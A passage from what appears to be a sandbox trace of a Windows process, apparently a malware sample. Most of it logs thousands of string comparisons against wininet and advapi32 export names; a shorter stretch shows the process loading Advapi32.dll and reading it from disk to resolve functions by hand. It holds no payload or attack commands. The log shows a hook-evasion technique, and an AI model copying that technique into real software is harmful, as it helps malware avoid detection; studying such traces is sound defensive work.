lpString2="AppCacheGetDownloadList") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0126.676] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0126.677] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.677] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0126.678] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0126.678] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0126.679] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0126.680] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0126.680] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0126.680] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0126.680] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0126.680] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0126.680] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0126.681] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0126.681] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0126.681] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0126.681] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0126.681] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0126.681] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0126.681] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0126.681] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0126.682] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0126.682] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0126.682] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0126.682] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0126.682] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0126.682] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0126.682] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0126.694] GetProcessHeap () returned 0x430000 [0126.694] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4124040 | out: hHeap=0x430000) returned 1 [0126.942] GetProcessHeap () returned 0x430000 [0126.942] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4492a0 [0126.943] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0126.944] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0126.944] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0126.944] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0126.944] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0126.944] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0126.944] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0126.944] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0126.944] GetProcessHeap () returned 0x430000 [0126.944] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa3ef0) returned 0x2d62010 [0126.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0126.947] ReadFile (in: hFile=0x140, lpBuffer=0x2d62010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d62010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0126.959] CloseHandle (hObject=0x140) returned 1 [0126.959] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0126.959] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0126.959] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0126.959] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0126.959] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0126.960] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0126.960] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0126.960] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0126.960] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0126.960] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0126.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0126.961] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0126.961] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0126.961] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0126.962] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0126.963] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.964] lstrcmpA 